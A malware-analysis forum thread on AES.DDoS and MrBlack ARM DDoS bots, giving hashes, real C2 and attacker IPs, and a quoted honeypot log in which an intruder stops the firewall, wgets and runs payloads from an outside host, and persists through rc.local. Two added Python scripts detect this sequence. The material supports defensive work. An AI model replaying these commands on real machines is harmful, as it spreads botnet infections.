A forum for reverse engineering, OS internals and malware analysis 

 #26760  by unixfreaxjp
 Sat Sep 19, 2015 8:16 am
Nice combination of Mr.Black & AES.DDoS in one panel.. :)
Report:
Code:
//  Name             Hashes                              MalwareName & Arch
    1. (2O16I1)    = c86fe64d074a7255968504be5aca8102 // mrblack.ddos ARM
    2. (312vt)     = 0005983da39751deb80264b10f7e16b0 // AES.DDoS ARM
    3. (scaqq)     = 60b25f9c03eca8dee74649d2f0ce3cf0 // AES.ddos ARM
// Files:
   2O16I1:   unpacked, ELF 32-bit LSB executable, ARM, EABI4 (SYSV), static, stripped
   312vt:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
   scaqq:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
CNC: 222.186.34.220 attacker: 60.166.61.110
Attachments: 7z/infected (549.54 KiB)
 #26950  by unixfreaxjp
 Wed Oct 14, 2015 9:49 pm
This is the AES.DDoS router (ARM) version, NOT MrBlack; please note this, although the code routes of both malware are the same.
Attacker/panel: 59.56.110.233:8081
CNC (IP basis) 59.56.110.233 port 48080
CNC is open PoC:
Code:
Thu Oct 15 06:39:21 JST 2015
233.110.56.59.in-addr.arpa [59.56.110.233] 48080 (http) open
Connection to 59.56.110.233 48080 port [tcp/48080] succeeded! 
Sample: https://www.virustotal.com/en/file/d0cc ... 444858548/
Attachments: 7z/infected (380.82 KiB)
 #26973  by unixfreaxjp
 Thu Oct 15, 2015 10:17 pm
Double panel, same payloads, at 123.249.29.244 and 115.230.124.153, w/ SSH attacker from 115.230.124.153
CNC is 123.249.29.244:11024
Code:
Int Server...
connect to server...
---server 123.249.29.244:11024---
---server 123.249.29.244:11024 (4095605115:4139)---
(UNKNOWN) [123.249.29.244] 11024 (?) open
Connection to 123.249.29.244 11024 port [tcp/*] succeeded!
READAS.MMD-KICKASS-SCUM.ORG TCP ->123.249.29.244:11024 (ESTABLISHED)
https://www.virustotal.com/en/file/e1ea ... 444947243/
Attachments: 7z/infected (169.21 KiB)
 #27017  by unixfreaxjp
 Tue Oct 20, 2015 2:16 am
This is AES.DDoSer, for ARM and Intel
https://www.virustotal.com/en/file/5c56 ... 445306739/
https://www.virustotal.com/en/file/58f7 ... 445306725/
Attack log:
Code:
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] outgoing: aes128-ctr hmac-sha1 none
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] incoming: aes128-ctr hmac-sha1 none
2015-10-20 10:12:29 sess/ip=2953,58.221.60.138] login attempt [admin/admin] succeeded
2015-10-20 10:12:33 sess/ip=2953,58.221.60.138] SHELL: /etc/init.d/iptables stop
2015-10-20 10:12:37 sess/ip=2953,58.221.60.138] SHELL: service iptables stop
2015-10-20 10:12:41 sess/ip=2953,58.221.60.138] SHELL: SuSEfirewall2 stop
2015-10-20 10:12:45 sess/ip=2953,58.221.60.138] SHELL: reSuSEfirewall2 stop
2015-10-20 10:12:49 sess/ip=2953,58.221.60.138] SHELL: cd /tmp
2015-10-20 10:12:53 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/linux-arm
2015-10-20 10:12:57 sess/ip=2953,58.221.60.138] SHELL: chmod 777 linux-arm
2015-10-20 10:13:02 sess/ip=2953,58.221.60.138] SHELL: ./linux-arm &
2015-10-20 10:13:05 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: chmod 777 Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: ./Linux2.6 &
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: echo "cd /tmp/">>/etc/rc.local
2015-10-20 10:13:26 sess/ip=2953,58.221.60.138] SHELL: echo "/etc/init.d/iptables stop">>/etc/rc.local
CNC checks: both are on the same IP and ports as the attacker and its panel.
Code:
linux-arm: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped
538c8a700e6299258380b9d7eff4ee31 linux-arm
open temporary file /etc/sede1dRLk
open temporary file /etc/sednbbFbg
read /etc/rc.d/rc.local
read /etc/init.d/boot.local
Connecting to 58.221.60.138 50050 port ..
(UNKNOWN) 58.221.60.138 50050 (?) open
Connection to 58.221.60.138 50050 port succeeded!
TCP MMD-KICKS-AESDDOS->58.221.60.138:50050 (ESTABLISHED)
VERSONEX:MMD-KICKS-AESDDOS|0|0 MHz|XXXMB|XXXMB|Hacker
INFO:0.5%|0.0XX Mbps
INFO:0.6%|0.0XX Mbps
Infection pace is high.
#MalwareMustDie!!
Attachments: 7z/infected (1.07 MiB)
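As an added example (not part of the post above and not MalwareMustDie tooling), the following Python script parses honeypot session lines in the format of the attack log quoted in this post and flags a session that walks through the stages seen there: firewall shutdown, wget of the payload, chmod, backgrounded execution and the rc.local append. The session ids, timestamps and IP addresses in SAMPLE_LOG are constructed for the example (RFC 5737 test addresses), and the stage names and the three-stage threshold are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample lines in the format of the honeypot log quoted in the post;
# session ids, timestamps and IPs are made up (RFC 5737 test addresses).
SAMPLE_LOG = """\
2015-10-20 10:12:29 sess/ip=2953,203.0.113.10] login attempt [admin/admin] succeeded
2015-10-20 10:12:33 sess/ip=2953,203.0.113.10] SHELL: /etc/init.d/iptables stop
2015-10-20 10:12:37 sess/ip=2953,203.0.113.10] SHELL: service iptables stop
2015-10-20 10:12:49 sess/ip=2953,203.0.113.10] SHELL: cd /tmp
2015-10-20 10:12:53 sess/ip=2953,203.0.113.10] SHELL: wget -c http://203.0.113.10:50000/linux-arm
2015-10-20 10:12:57 sess/ip=2953,203.0.113.10] SHELL: chmod 777 linux-arm
2015-10-20 10:13:02 sess/ip=2953,203.0.113.10] SHELL: ./linux-arm &
2015-10-20 10:13:19 sess/ip=2953,203.0.113.10] SHELL: echo "cd /tmp/">>/etc/rc.local
2015-10-20 10:13:26 sess/ip=2953,203.0.113.10] SHELL: echo "/etc/init.d/iptables stop">>/etc/rc.local
2015-10-20 11:00:01 sess/ip=3001,198.51.100.7] login attempt [root/toor] succeeded
2015-10-20 11:00:05 sess/ip=3001,198.51.100.7] SHELL: uname -a
"""

# One honeypot line: "<date> <time> sess/ip=<sess>,<ip>] <event>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) sess/ip=(?P<sess>\d+),(?P<ip>[\d.]+)\] (?P<event>.*)$"
)

# One regex per stage of the drop sequence seen in the quoted session.
# Stage names are this example's own labels.
STAGES = {
    "firewall_disable": re.compile(r"(?:iptables stop|SuSEfirewall2 stop)"),
    "payload_download": re.compile(r"\bwget\b.*https?://\S+"),
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s"),
    "background_exec": re.compile(r"^\./\S+\s*&"),
    "rc_local_persist": re.compile(r">>\s*/etc/rc\.local"),
}


def parse_line(line):
    """Return a dict with ts, sess, ip and event for one log line, or None."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze_sessions(log_text):
    """Group lines by session id and record which stages each session showed."""
    sessions = defaultdict(lambda: {"ip": None, "stages": [], "urls": []})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        s = sessions[rec["sess"]]
        s["ip"] = rec["ip"]
        if not rec["event"].startswith("SHELL: "):
            continue
        cmd = rec["event"][len("SHELL: "):]
        for name, pat in STAGES.items():
            # record each stage once, in the order it first appeared
            if name not in s["stages"] and pat.search(cmd):
                s["stages"].append(name)
        # payload URLs are the most useful pivot for blocking and hunting
        s["urls"].extend(re.findall(r"https?://\S+", cmd))
    return dict(sessions)


def is_bot_drop(session, min_stages=3):
    """Flag a session that reached at least min_stages of the sequence."""
    return len(session["stages"]) >= min_stages


if __name__ == "__main__":
    for sess_id, s in analyze_sessions(SAMPLE_LOG).items():
        flag = "DROP" if is_bot_drop(s) else "ok  "
        print(f"{flag} session {sess_id} from {s['ip']}: {', '.join(s['stages']) or '-'}")
        for u in s["urls"]:
            print(f"     payload URL: {u}")
```

The threshold is deliberately below the full five stages so that a session cut off after the chmod, or one whose persistence step uses a different file, is still surfaced; the firewall-stop commands on their own are a weak signal and should not trip the rule alone.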
 #27841  by unixfreaxjp
 Wed Feb 10, 2016 8:08 am
Memo:
AES.DDoS attack switch latest version (case switch 0x01 to 0x0C)
Typical MO:
Code:
/etc/sed[a-zA-Z0-9]{5}
/etc/rc.d/rc.local
/etc/init.d/boot.local
Network:
Code:
CNC: 115.231.219.147:48080 (ip base) AS4134 ChinaNet-ZJ Shaoxing
PNL: 222.186.26.121:443 (hacked victim) AS23650 ChinaNet Jiangsu
Note:
Do make a signature from this sample, and your product can detect all of the AES.DDoS variants correctly w/o mixing them with MrBlack.
Reversing some flood techniques is a good way to mitigate them, like this.

#MalwareMustDie
Attachments: 7z/infected (639.32 KiB)
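As an added example (not part of the memo above), the following Python host check turns the "Typical MO" into something an incident responder can run against a file listing and the startup files: it looks for the /etc/sed temp files and for the lines the attack appended to rc.local in the earlier post. The memo's pattern uses five characters after "sed", while the two temp files quoted in post #27017 (/etc/sede1dRLk, /etc/sednbbFbg) have six, so the example accepts five or six as an assumption. The listing and file contents in SAMPLE_ETC and SAMPLE_STARTUP are constructed.

```python
import re

# Pattern from the memo; the two names quoted in post #27017 have six characters
# after "sed", so this example (an assumption) accepts five or six.
TEMPFILE_RE = re.compile(r"^/etc/sed[a-zA-Z0-9]{5,6}$")

# Lines the quoted attack appended to rc.local: change to /tmp, stop the
# firewall, and start a dropped binary in the background.
PERSIST_RE = re.compile(
    r"^(?:cd /tmp/?|/etc/init\.d/iptables stop|service iptables stop|\./\S+\s*&?)\s*$"
)

# Constructed data for the example: an /etc listing and two startup files.
SAMPLE_ETC = ["/etc/passwd", "/etc/rc.local", "/etc/sedAb12Xy", "/etc/hosts", "/etc/sedtoolong1"]
SAMPLE_STARTUP = {
    "/etc/rc.local": "#!/bin/sh -e\n# rc.local\ncd /tmp/\n/etc/init.d/iptables stop\n./linux-arm &\n",
    "/etc/init.d/boot.local": "#!/bin/sh\n# boot.local\n",
}


def suspicious_tempfiles(paths):
    """Paths in /etc matching the AES.DDoS temp-file naming."""
    return sorted(p for p in paths if TEMPFILE_RE.match(p))


def suspicious_startup_lines(content):
    """(line number, text) for non-comment lines matching the appended commands."""
    hits = []
    for n, line in enumerate(content.splitlines(), 1):
        s = line.strip()
        if s and not s.startswith("#") and PERSIST_RE.match(s):
            hits.append((n, s))
    return hits


def assess(etc_listing, startup_files):
    """startup_files maps path -> content. Returns a report with a verdict."""
    report = {"tempfiles": suspicious_tempfiles(etc_listing), "startup": {}}
    for path, content in startup_files.items():
        hits = suspicious_startup_lines(content)
        if hits:
            report["startup"][path] = hits
    if report["startup"]:
        report["verdict"] = "likely_infected"
    elif report["tempfiles"]:
        # a lone leftover can also come from an interrupted "sed -i" on a file
        # in /etc, so this is a lead to inspect rather than a conviction
        report["verdict"] = "check_tempfiles"
    else:
        report["verdict"] = "clean"
    return report


if __name__ == "__main__":
    r = assess(SAMPLE_ETC, SAMPLE_STARTUP)
    print("verdict:", r["verdict"])
    print("temp files:", r["tempfiles"])
    for path, hits in r["startup"].items():
        for n, text in hits:
            print(f"{path}:{n}: {text}")
```

The startup-file hits carry the weight here: GNU sed -i itself writes a sedXXXXXX temp file next to the file it edits, so a stray /etc/sed* name on its own only earns the lower "check_tempfiles" verdict, and the rc.local or boot.local lines decide.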